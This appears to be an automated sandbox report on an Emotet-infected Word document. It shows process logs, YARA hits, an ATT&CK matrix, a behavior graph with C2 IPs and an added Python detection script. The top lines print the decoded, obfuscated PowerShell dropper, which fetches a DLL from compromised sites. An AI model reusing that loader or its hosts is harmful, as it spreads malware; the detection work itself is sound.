                      Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded SeT-vARiaBLe ("T4"+"Kd6") ( [Type]("{2}{3}{5}{0}{4}{1}" -F 're','rY','SY','sTe','ctO','m.Io.DI') ); SEt 428 ( [TYpe]("{3}{7}{0}{5}{6}{2}{4}{8}{1}"-f'EM.nET.','er','t','SYs','M','sERViCE','PoIN','t','aNag')) ; $Jrnzmks=$A16L + [char](33) + $Y11F;$M20M=('O1'+'8W'); (IteM ("VArIABlE:T4k"+"D"+"6") ).vAlUe::"CreAT`EdIReCt`Ory"($HOME + (('{0}'+'Snuvw2w{0'+'}V'+'46'+'51pz{0'+'}') -F[CHar]92));$E20V=(('B1'+'3')+'A'); $428::"sEcu`R`ityP`R`OTocol" = (('T'+'ls1')+'2');$E_9Q=(('G'+'91')+'N');$Wsxw52z = ('H'+('64'+'C'));$L04N=('V'+('16'+'F'));$Xdn5xhg=$HOME+(('{0}Snuvw'+'2w{0}V'+('465'+'1p')+'z{0}')-F[CHar]92)+$Wsxw52z+'.d' + 'll';$X28G=('W0'+'1E');$O338_77='h' + 'tt' + 'p';$Xap1lma=('x'+' '+('['+' sh b:'+'//')+('co'+'wor')+('k'+'ingpl')+'us'+'.'+('es'+'/w')+('p-a'+'dmin'+'/Fxm')+('ME'+'/')+'!'+'x'+' ['+' '+'sh'+(' b'+':'+'//silk'+'o')+('nbu'+'si')+'ne'+('ss.'+'m')+'a'+('t'+'rixin'+'fotec'+'hsoluti')+('on.c'+'o')+'m'+('/'+'js')+('/'+'q26')+('/!'+'x [')+' '+'sh'+(' b'+'s:/')+'/'+('bbj'+'u')+('gu'+'eter'+'ia')+('.com'+'/s6k')+('sc'+'x')+'/'+'Z'+('/!'+'x')+' ['+' '+'s'+('h'+' '+'bs:/')+'/'+('ww'+'w')+'.b'+'i'+'m'+'ce'+'p'+'ti'+('on.c'+'o')+('m/w'+'p-admin/sHy'+'5t/'+'!x ['+' '+'s'+'h b://armak')+'on'+('ar'+'ms.'+'c')+'o'+'m/'+'w'+('p-i'+'n')+('clu'+'de'+'s/fz/'+'!')+'x '+('['+' s')+('h'+' b:/'+'/al')+('u'+'g'+'rama.c')+('om'+'.')+'m'+'x'+'/'+'t/'+('2/!x'+' '+'[ sh')+(' b'+':')+('/'+'/ho')+'me'+('cass.co'+'m/'+'wp')+('-c'+'ont')+('ent'+'/iF'+'/'))."Re`Pl`ACe"(('x '+('[ sh'+'
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc ...
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',FkNpAoTRbYmZ
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',MapzU
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',mIFAsDzIotZuZ
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',iaFY
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',WysFLGeRRae
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',ZENT
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',#1
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc ...
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc ...
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected Emotet
                      Source: Yara matchFile source: 00000009.00000002.2125452150.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2188345600.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2207082899.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2149603848.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2187673787.0000000000150000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2207752996.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2125404655.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2176671171.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2339396360.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2107659481.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2158799762.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2115709278.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2197495102.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2226062410.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2176658564.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2207040108.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2138353893.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2166530116.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2147996106.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2148213455.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2135403936.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2218991532.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2119181462.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2217422949.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2180490151.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2166511135.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2341403788.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2339372095.0000000000150000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2157690183.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2107638490.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2217659193.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2126211663.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2226800833.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2199714499.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2197524650.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2226045292.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2135436680.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2167094683.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2187719578.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2115685260.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2157667927.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.690000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.690000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

Techniques by tactic (the page's matrix, flattened; digits appended to a technique name are the count badges the page shows next to matched techniques, kept as rendered):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation11; Command and Scripting Interpreter211; Scripting22; Exploitation for Client Execution3; PowerShell2; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: Process Injection111; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Masquerading11; Virtualization/Sandbox Evasion2; Disable or Modify Tools11; Process Injection111; Deobfuscate/Decode Files or Information3; Scripting22; Hidden Files and Directories1; Obfuscated Files or Information111; Rundll321
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Security Software Discovery1; Virtualization/Sandbox Evasion2; Process Discovery1; Remote System Discovery1; File and Directory Discovery2; System Information Discovery15; Network Sniffing; Network Service Scanning; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel12; Non-Standard Port1; Ingress Tool Transfer4; Non-Application Layer Protocol4; Application Layer Protocol15; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

                      Behavior Graph


                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 343551  Sample: 79a2gzs3gkk.doc  Startdate: 24/01/2021  Architecture: WINDOWS  Score: 100

Signatures attached to the start node: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 12 other signatures

Process tree recovered from the graph (indentation shows parent -> child; the numbers after a process name are the node counters from the graph, see the legend above; cmd.exe is drawn at the top level next to WINWORD.EXE, not under it):

WINWORD.EXE 293 26
cmd.exe
    signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found
    powershell.exe 12 9
        DNS/IP: bimception.com 162.241.224.176, 443, 49169, 49170 UNIFIEDLAYER-AS-1US United States
        DNS/IP: bbjugueteria.com 162.241.60.240, 443, 49167, 49168 UNIFIEDLAYER-AS-1US United States
        DNS/IP: 5 other IPs or domains
        dropped: C:\Users\user\Snuvw2w\V4651pz\H64C.dll, data
        rundll32.exe
            rundll32.exe
                rundll32.exe 2
                    signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                    rundll32.exe
                        rundll32.exe 1
                            signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                            rundll32.exe
                                rundll32.exe 1
                                    signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                                    rundll32.exe
    msg.exe
        rundll32.exe
            signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
            rundll32.exe
                rundll32.exe
                    DNS/IP: 69.38.130.14, 80 TWRS-NYCUS United States
                    DNS/IP: 195.159.28.230, 49174, 8080 ASN-CATCHCOMNO Norway
                    signature: System process connects to network (likely due to code injection or exploit)
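The graph above is the detection-relevant part of the report: a script interpreter chain ending in rundll32.exe, an encoded PowerShell command line, and rundll32.exe talking to 195.159.28.230 on port 8080. Note that cmd.exe sits at the top level next to WINWORD.EXE rather than under it; that is what a process started through WMI looks like, because the child's parent is then WmiPrvSE.exe, so a rule keyed on "Office spawned cmd.exe" would miss it. The following is an added example, not code from the sandbox or the report, that runs those checks over Sysmon-style process and network events. The event format is assumed; the pids, the base64 payload and the rundll32 export "#1" in the sample events are invented to mirror the graph.

```python
"""Detection over Sysmon-style process and network events for the chain the
behavior graph shows: interpreter started via WMI -> powershell with an encoded
command -> rundll32.exe, with rundll32 talking to a non-standard port.
Added example; the events below are constructed (pids, payload and export
ordinal invented), not sandbox output."""
import re

INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
WEB_PORTS = {80, 443}
B64 = re.compile(r"[A-Za-z0-9+/=]{20,}")

# Constructed events. cmd.exe is a child of WmiPrvSE.exe, not of WINWORD.EXE:
# a process created through WMI gets the WMI provider host as its parent, which
# is why the graph shows cmd.exe beside WINWORD.EXE instead of under it.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": 'WINWORD.EXE /n "79a2gzs3gkk.doc"'},
    {"type": "process", "pid": 150, "ppid": 1, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "WmiPrvSE.exe"},
    {"type": "process", "pid": 200, "ppid": 150, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell -enco JABhAGIAYwA9ACIAeAAiAA=="},
    {"type": "process", "pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -enco JABhAGIAYwA9ACIAeAAiAA=="},
    {"type": "process", "pid": 400, "ppid": 300, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\Snuvw2w\V4651pz\H64C.dll,#1"},
    {"type": "network", "pid": 400, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "dst_ip": "195.159.28.230", "dst_port": 8080},
    # Benign control: rundll32 started by explorer.exe, talking to 443.
    {"type": "process", "pid": 600, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process", "pid": 700, "ppid": 600, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"type": "network", "pid": 700, "image": r"C:\Windows\System32\rundll32.exe",
     "dst_ip": "203.0.113.10", "dst_port": 443},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_encoded_powershell(cmdline):
    """True if the command line carries -EncodedCommand, or any abbreviation
    PowerShell accepts for it (-e, -ec, -enc, -enco, ...), followed by a
    base64-looking argument. The abbreviation test is a prefix check, not a
    fixed list, so unusual spellings such as -encodedc are caught as well."""
    toks = cmdline.split()
    for flag, arg in zip(toks, toks[1:]):
        if flag[:1] in "-/" and len(flag) > 1 and "encodedcommand".startswith(flag[1:].lower()):
            if B64.fullmatch(arg):
                return True
    return False


def ancestry(events, pid):
    """Image names from pid up to the oldest parent present in the events."""
    by_pid = {e["pid"]: e for e in events if e["type"] == "process"}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    findings = []
    for e in events:
        if e["type"] != "process":
            continue
        name = basename(e["image"])
        chain = ancestry(events, e["pid"])
        parent = chain[1] if len(chain) > 1 else None
        if name in INTERPRETERS and parent == "wmiprvse.exe":
            findings.append(("interpreter_spawned_via_wmi", e["pid"]))
        if name == "powershell.exe" and is_encoded_powershell(e["cmdline"]):
            findings.append(("encoded_powershell", e["pid"]))
        if name == "rundll32.exe" and any(a in INTERPRETERS for a in chain[1:]):
            findings.append(("rundll32_under_script_interpreter", e["pid"]))
    for e in events:
        if e["type"] == "network" and basename(e["image"]) == "rundll32.exe" \
                and e["dst_port"] not in WEB_PORTS:
            findings.append(("rundll32_nonstandard_port", e["pid"]))
    return findings


if __name__ == "__main__":
    for kind, pid in detect(SAMPLE_EVENTS):
        print(f"{kind}: pid {pid}")
```

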